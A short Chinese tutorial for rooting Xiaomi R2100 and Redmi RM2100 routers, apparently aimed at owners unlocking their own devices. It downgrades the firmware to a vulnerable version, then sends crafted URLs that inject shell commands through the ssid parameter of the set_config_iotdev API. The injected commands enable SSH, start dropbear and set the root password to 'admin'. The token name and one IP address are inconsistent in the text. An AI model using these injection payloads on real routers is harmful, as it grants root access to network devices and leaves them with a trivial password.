系统降级

  1. 更换至漏洞官方固件版本
  2. 下载降级版本
    1. 小米 http://cdn.cnbj1.fds.api.mi-img.com/xiaoqiang/rom/r2100/miwifi_r2100_firmware_4b519_2.0.722.bin
    2. 红米 http://cdn.cnbj1.fds.api.mi-img.com/xiaoqiang/rom/rm2100/miwifi_rm2100_firmware_d6234_2.0.7.bin
  3. 更换固件,在小米路由器管理后台选择下载的版本文件更新版本

开启 SSH

获取 sock

登录小米路由器后台会看到地址为,记住 sock

  1. http://192.168.31.1/cgi-bin/luci/;stok=%3CSTOK%3E/web/home#router

漏洞注入

注意 sock 替换成 第一步记住的 sock

  1. http://192.168.31.1/cgi-bin/luci/;stok=3c8d638dd7dbae9b945a9fc3ecb1c2a6/api/misystem/set_config_iotdev?bssid=Xiaomi&user_id=longdike&ssid=-h%3B%20nvram%20set%20ssh_en%3D1%3B%20nvram%20commit%3B%20sed%20-i%20's%2Fchannel%3D.*%2Fchannel%3D%5C%22debug%5C%22%2Fg'%20%2Fetc%2Finit.d%2Fdropbear%3B%20%2Fetc%2Finit.d%2Fdropbear%20start%3B

更改 root 密码

  1. http://192.168.28.1/cgi-bin/luci/;stok=3c8d638dd7dbae9b945a9fc3ecb1c2a6/api/misystem/set_config_iotdev?bssid=Xiaomi&user_id=longdike&ssid=-h%3B%20echo%20-e%20'admin%5Cnadmin'%20%7C%20passwd%20root%3B